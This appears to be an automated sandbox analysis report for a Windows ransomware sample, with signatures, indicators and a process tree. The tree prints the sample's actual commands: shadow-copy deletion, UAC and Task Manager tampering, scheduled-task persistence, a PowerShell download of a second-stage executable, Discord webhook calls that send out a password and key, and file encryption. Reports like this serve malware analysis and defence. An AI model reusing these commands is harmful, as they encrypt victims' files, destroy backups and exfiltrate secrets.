9e4f1334d3712298cb3d18e38cd954c893c890d09ad457683c8d7956a9bdb635

Analysis

max time kernel
92s
max time network
117s
platform
windows10_x64
resource
win10v20201028
submitted
18/02/2021, 08:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RenderGraphics.bin.exe
Size

1006KB
MD5

46a1769d81d7dcda455f0f05b9b29648
SHA1

4d56dffea9d04ee8ed174f1b3328675daf4be7b1
SHA256

9e4f1334d3712298cb3d18e38cd954c893c890d09ad457683c8d7956a9bdb635
SHA512

8c8ed91b996f84807be1337fe770db4eadd0a7da00fe0545f6de86bd577054dc9a3df22cd81e25ffb4f1ea3e7642409ff9e01a57c582abb099719b069c9fc193

Score

10^/10

evasion ransomware spyware trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe

Signatures

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Blocklisted process makes network request 2 IoCs

flow	pid	Process
14	2572	powershell.exe
16	2572	powershell.exe

Disables Task Manager via registry modification
evasion

Executes dropped EXE 64 IoCs

pid	Process
4556	DiscordSendWebhook.exe
4452	DiscordSendWebhook.exe
4324	aescrypt.exe
2284	aescrypt.exe
5092	aescrypt.exe
3920	aescrypt.exe
3288	aescrypt.exe
4288	aescrypt.exe
3148	aescrypt.exe
4072	aescrypt.exe
5008	aescrypt.exe
4528	aescrypt.exe
4584	aescrypt.exe
4572	aescrypt.exe
4576	aescrypt.exe
1524	aescrypt.exe
1288	aescrypt.exe
1772	aescrypt.exe
1816	aescrypt.exe
2384	aescrypt.exe
2604	aescrypt.exe
2596	aescrypt.exe
4708	aescrypt.exe
4460	aescrypt.exe
4628	aescrypt.exe
764	aescrypt.exe
3960	aescrypt.exe
3084	aescrypt.exe
4520	aescrypt.exe
4484	aescrypt.exe
4632	aescrypt.exe
604	aescrypt.exe
436	aescrypt.exe
632	aescrypt.exe
1268	aescrypt.exe
1676	aescrypt.exe
2160	aescrypt.exe
2304	aescrypt.exe
2500	aescrypt.exe
2856	aescrypt.exe
4716	aescrypt.exe
2588	aescrypt.exe
4412	aescrypt.exe
1364	aescrypt.exe
804	aescrypt.exe
2296	aescrypt.exe
4684	aescrypt.exe
3664	aescrypt.exe
4608	aescrypt.exe
3116	aescrypt.exe
2220	aescrypt.exe
2212	aescrypt.exe
4796	aescrypt.exe
272	aescrypt.exe
3568	aescrypt.exe
280	aescrypt.exe
4268	aescrypt.exe
3432	aescrypt.exe
4476	aescrypt.exe
4076	aescrypt.exe
3488	aescrypt.exe
4464	aescrypt.exe
4620	aescrypt.exe
3196	aescrypt.exe

Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RenderGraphics.bin.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RenderGraphics.bin.exe	cmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2568	schtasks.exe
204	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1960	vssadmin.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
1548	taskkill.exe
2152	taskkill.exe
1644	taskkill.exe
1820	taskkill.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\Mouse	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\Mouse\SwapMouseButtons = "1"	reg.exe

Modifies registry class 36 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2"	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	NOTEPAD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	NOTEPAD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	NOTEPAD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	NOTEPAD.EXE

Opens file in notepad (likely ransom note) 3 IoCs

ransomware

pid	Process
4720	NOTEPAD.EXE
3236	NOTEPAD.EXE
4248	NOTEPAD.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	10	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	18	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 30 IoCs

pid	Process
992	powershell.exe
992	powershell.exe
992	powershell.exe
2572	powershell.exe
2572	powershell.exe
2572	powershell.exe
1380	powershell.exe
1380	powershell.exe
1380	powershell.exe
4340	powershell.exe
4340	powershell.exe
4340	powershell.exe
4048	powershell.exe
4048	powershell.exe
4048	powershell.exe
4260	powershell.exe
4260	powershell.exe
4260	powershell.exe
2096	powershell.exe
2096	powershell.exe
2096	powershell.exe
4060	powershell.exe
4060	powershell.exe
4060	powershell.exe
4544	powershell.exe
4544	powershell.exe
4544	powershell.exe
2164	powershell.exe
2164	powershell.exe
2164	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
4720	NOTEPAD.EXE
2628	OpenWith.exe

Suspicious use of AdjustPrivilegeToken 59 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4256	WMIC.exe
Token: SeSecurityPrivilege	4256	WMIC.exe
Token: SeTakeOwnershipPrivilege	4256	WMIC.exe
Token: SeLoadDriverPrivilege	4256	WMIC.exe
Token: SeSystemProfilePrivilege	4256	WMIC.exe
Token: SeSystemtimePrivilege	4256	WMIC.exe
Token: SeProfSingleProcessPrivilege	4256	WMIC.exe
Token: SeIncBasePriorityPrivilege	4256	WMIC.exe
Token: SeCreatePagefilePrivilege	4256	WMIC.exe
Token: SeBackupPrivilege	4256	WMIC.exe
Token: SeRestorePrivilege	4256	WMIC.exe
Token: SeShutdownPrivilege	4256	WMIC.exe
Token: SeDebugPrivilege	4256	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4256	WMIC.exe
Token: SeRemoteShutdownPrivilege	4256	WMIC.exe
Token: SeUndockPrivilege	4256	WMIC.exe
Token: SeManageVolumePrivilege	4256	WMIC.exe
Token: 33	4256	WMIC.exe
Token: 34	4256	WMIC.exe
Token: 35	4256	WMIC.exe
Token: 36	4256	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4256	WMIC.exe
Token: SeSecurityPrivilege	4256	WMIC.exe
Token: SeTakeOwnershipPrivilege	4256	WMIC.exe
Token: SeLoadDriverPrivilege	4256	WMIC.exe
Token: SeSystemProfilePrivilege	4256	WMIC.exe
Token: SeSystemtimePrivilege	4256	WMIC.exe
Token: SeProfSingleProcessPrivilege	4256	WMIC.exe
Token: SeIncBasePriorityPrivilege	4256	WMIC.exe
Token: SeCreatePagefilePrivilege	4256	WMIC.exe
Token: SeBackupPrivilege	4256	WMIC.exe
Token: SeRestorePrivilege	4256	WMIC.exe
Token: SeShutdownPrivilege	4256	WMIC.exe
Token: SeDebugPrivilege	4256	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4256	WMIC.exe
Token: SeRemoteShutdownPrivilege	4256	WMIC.exe
Token: SeUndockPrivilege	4256	WMIC.exe
Token: SeManageVolumePrivilege	4256	WMIC.exe
Token: 33	4256	WMIC.exe
Token: 34	4256	WMIC.exe
Token: 35	4256	WMIC.exe
Token: 36	4256	WMIC.exe
Token: SeBackupPrivilege	4164	vssvc.exe
Token: SeRestorePrivilege	4164	vssvc.exe
Token: SeAuditPrivilege	4164	vssvc.exe
Token: SeDebugPrivilege	992	powershell.exe
Token: SeDebugPrivilege	1644	taskkill.exe
Token: SeDebugPrivilege	1820	taskkill.exe
Token: SeDebugPrivilege	1548	taskkill.exe
Token: SeDebugPrivilege	2152	taskkill.exe
Token: SeDebugPrivilege	2572	powershell.exe
Token: SeDebugPrivilege	1380	powershell.exe
Token: SeDebugPrivilege	4340	powershell.exe
Token: SeDebugPrivilege	4048	powershell.exe
Token: SeDebugPrivilege	4260	powershell.exe
Token: SeDebugPrivilege	2096	powershell.exe
Token: SeDebugPrivilege	4060	powershell.exe
Token: SeDebugPrivilege	4544	powershell.exe
Token: SeDebugPrivilege	2164	powershell.exe

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
4556	DiscordSendWebhook.exe
4556	DiscordSendWebhook.exe
4556	DiscordSendWebhook.exe
4452	DiscordSendWebhook.exe
4452	DiscordSendWebhook.exe
4452	DiscordSendWebhook.exe

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
4556	DiscordSendWebhook.exe
4556	DiscordSendWebhook.exe
4556	DiscordSendWebhook.exe
4452	DiscordSendWebhook.exe
4452	DiscordSendWebhook.exe
4452	DiscordSendWebhook.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4720	NOTEPAD.EXE
2628	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4764 wrote to memory of 3580	4764	RenderGraphics.bin.exe	75
PID 4764 wrote to memory of 3580	4764	RenderGraphics.bin.exe	75
PID 3580 wrote to memory of 4256	3580	cmd.exe	78
PID 3580 wrote to memory of 4256	3580	cmd.exe	78
PID 3580 wrote to memory of 1960	3580	cmd.exe	83
PID 3580 wrote to memory of 1960	3580	cmd.exe	83
PID 3580 wrote to memory of 3432	3580	cmd.exe	84
PID 3580 wrote to memory of 3432	3580	cmd.exe	84
PID 3580 wrote to memory of 4428	3580	cmd.exe	85
PID 3580 wrote to memory of 4428	3580	cmd.exe	85
PID 3580 wrote to memory of 4060	3580	cmd.exe	86
PID 3580 wrote to memory of 4060	3580	cmd.exe	86
PID 3580 wrote to memory of 4436	3580	cmd.exe	87
PID 3580 wrote to memory of 4436	3580	cmd.exe	87
PID 3580 wrote to memory of 3452	3580	cmd.exe	88
PID 3580 wrote to memory of 3452	3580	cmd.exe	88
PID 3580 wrote to memory of 1856	3580	cmd.exe	89
PID 3580 wrote to memory of 1856	3580	cmd.exe	89
PID 3580 wrote to memory of 4504	3580	cmd.exe	90
PID 3580 wrote to memory of 4504	3580	cmd.exe	90
PID 3580 wrote to memory of 4520	3580	cmd.exe	91
PID 3580 wrote to memory of 4520	3580	cmd.exe	91
PID 3580 wrote to memory of 4524	3580	cmd.exe	92
PID 3580 wrote to memory of 4524	3580	cmd.exe	92
PID 3580 wrote to memory of 4556	3580	cmd.exe	93
PID 3580 wrote to memory of 4556	3580	cmd.exe	93
PID 3580 wrote to memory of 4556	3580	cmd.exe	93
PID 3580 wrote to memory of 992	3580	cmd.exe	94
PID 3580 wrote to memory of 992	3580	cmd.exe	94
PID 3580 wrote to memory of 1644	3580	cmd.exe	95
PID 3580 wrote to memory of 1644	3580	cmd.exe	95
PID 3580 wrote to memory of 1820	3580	cmd.exe	96
PID 3580 wrote to memory of 1820	3580	cmd.exe	96
PID 3580 wrote to memory of 1548	3580	cmd.exe	97
PID 3580 wrote to memory of 1548	3580	cmd.exe	97
PID 3580 wrote to memory of 2152	3580	cmd.exe	98
PID 3580 wrote to memory of 2152	3580	cmd.exe	98
PID 3580 wrote to memory of 2568	3580	cmd.exe	99
PID 3580 wrote to memory of 2568	3580	cmd.exe	99
PID 3580 wrote to memory of 2572	3580	cmd.exe	100
PID 3580 wrote to memory of 2572	3580	cmd.exe	100
PID 3580 wrote to memory of 204	3580	cmd.exe	103
PID 3580 wrote to memory of 204	3580	cmd.exe	103
PID 3580 wrote to memory of 4452	3580	cmd.exe	104
PID 3580 wrote to memory of 4452	3580	cmd.exe	104
PID 3580 wrote to memory of 4452	3580	cmd.exe	104
PID 3580 wrote to memory of 1380	3580	cmd.exe	105
PID 3580 wrote to memory of 1380	3580	cmd.exe	105
PID 3580 wrote to memory of 4336	3580	cmd.exe	106
PID 3580 wrote to memory of 4336	3580	cmd.exe	106
PID 3580 wrote to memory of 4356	3580	cmd.exe	107
PID 3580 wrote to memory of 4356	3580	cmd.exe	107
PID 3580 wrote to memory of 4324	3580	cmd.exe	108
PID 3580 wrote to memory of 4324	3580	cmd.exe	108
PID 3580 wrote to memory of 4324	3580	cmd.exe	108
PID 3580 wrote to memory of 3088	3580	cmd.exe	109
PID 3580 wrote to memory of 3088	3580	cmd.exe	109
PID 3580 wrote to memory of 2284	3580	cmd.exe	110
PID 3580 wrote to memory of 2284	3580	cmd.exe	110
PID 3580 wrote to memory of 2284	3580	cmd.exe	110
PID 3580 wrote to memory of 2212	3580	cmd.exe	111
PID 3580 wrote to memory of 2212	3580	cmd.exe	111
PID 3580 wrote to memory of 5092	3580	cmd.exe	112
PID 3580 wrote to memory of 5092	3580	cmd.exe	112

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
224	attrib.exe
4352	attrib.exe
2692	attrib.exe
1096	attrib.exe
532	attrib.exe
4724	attrib.exe
3032	attrib.exe
4372	attrib.exe
4536	attrib.exe
1504	attrib.exe
292	attrib.exe
4504	attrib.exe
3088	attrib.exe
4260	attrib.exe
4844	attrib.exe
4356	attrib.exe
4544	attrib.exe
228	attrib.exe
4252	attrib.exe
1876	attrib.exe
1644	attrib.exe
3372	attrib.exe
4560	attrib.exe
2692	attrib.exe
4732	attrib.exe
200	attrib.exe
2564	attrib.exe
2156	attrib.exe
4928	attrib.exe
3924	attrib.exe
4848	attrib.exe
4544	attrib.exe
1184	attrib.exe
3928	attrib.exe
3340	attrib.exe
1280	attrib.exe
968	attrib.exe
2348	attrib.exe
4068	attrib.exe
2496	attrib.exe
4700	attrib.exe
528	attrib.exe
3268	attrib.exe
4596	attrib.exe
4900	attrib.exe
532	attrib.exe
1960	attrib.exe
1692	attrib.exe
2368	attrib.exe
4372	attrib.exe
1180	attrib.exe
4620	attrib.exe
4524	attrib.exe
4712	attrib.exe
4296	attrib.exe
1520	attrib.exe
1820	attrib.exe
4744	attrib.exe
4524	attrib.exe
3916	attrib.exe
1136	attrib.exe
4756	attrib.exe
4448	attrib.exe
1404	attrib.exe

C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe
"C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4764
- C:\Windows\System32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2754.tmp\2755.tmp\2756.bat C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe"
  2⤵
  - Drops startup file
  - Suspicious use of WriteProcessMemory
  PID:3580
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4256
- - C:\Windows\system32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:1960
- - C:\Windows\system32\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f
    3⤵
    PID:3432
- - C:\Windows\system32\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
    3⤵
    PID:4428
- - C:\Windows\system32\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "1" /f
    3⤵
    PID:4060
- - C:\Windows\system32\reg.exe
    REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
    3⤵
    PID:4436
- - C:\Windows\system32\reg.exe
    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
    3⤵
    PID:3452
- - C:\Windows\system32\reg.exe
    REG ADD "HKCU\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d "1" /f
    3⤵
    - Modifies Control Panel
    PID:1856
- - C:\Windows\system32\attrib.exe
    attrib +r +s +h C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe
    3⤵
    PID:4504
- - C:\Windows\system32\attrib.exe
    attrib +r +s +h "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe"
    3⤵
    PID:4520
- - C:\Windows\system32\attrib.exe
    attrib +r +s +h "C:\Users\Admin\AppData\Local\Temp\2754.tmp\DiscordSendWebhook.exe"
    3⤵
    - Views/modifies file attributes
    PID:4524
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\DiscordSendWebhook.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\DiscordSendWebhook" -m ":writing_hand: LEAKGAP: Crypting Files..." -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:4556
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell start -verb runas cmd.exe -ArgumentList "/c kill.bat" -filepath "C:\Users\Admin\AppData\Local\Temp" -WindowStyle hidden
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:992
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im opera.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1644
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im chrome.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1820
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im firefox.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1548
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im iexplore.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2152
- - C:\Windows\system32\schtasks.exe
    schtasks /create /sc onlogon /tn UpdateWuauclt /rl highest /tr "C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe" /RU "SYSTEM" /f
    3⤵
    - Creates scheduled task(s)
    PID:2568
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c (new-object System.Net.WebClient).DownloadFile('https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe','C:\Users\Admin\AppData\Local\Temp\final.exe')
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2572
- - C:\Windows\system32\schtasks.exe
    schtasks /create /sc DAILY /tn UpdateWuaucltHelper /rl highest /tr "C:\Users\Admin\AppData\Local\Temp\final.exe" /RU "SYSTEM" /MO 5
    3⤵
    - Creates scheduled task(s)
    PID:204
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\DiscordSendWebhook.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\DiscordSendWebhook" -m ":satellite: LEAKGAP: Info from Admin, Password: mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu, FakeAccount: HPjUqt0Zobp8sM0YzACaWXGjN7A5XQIVztB, PersonalKey:||BAqQWM65otDWfLOyQXnL5gJo1XkRaoeKP81JVP||" -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:4452
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell start-process -verb runas -FilePath "C:\Users\Admin\AppData\Local\Temp\final.exe" -WindowStyle hidden
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1380
- - C:\Windows\system32\attrib.exe
    attrib +r +s +h C:\Users\Admin\AppData\Local\Temp /s /D
    3⤵
    PID:4336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4356
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "desktop.ini.lck" "desktop.ini"
    3⤵
    - Executes dropped EXE
    PID:4324
- - C:\Windows\system32\attrib.exe
    attrib +r "desktop.ini.lck"
    3⤵
    - Views/modifies file attributes
    PID:3088
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RegisterOptimize.mpeg.lck" "RegisterOptimize.mpeg"
    3⤵
    - Executes dropped EXE
    PID:2284
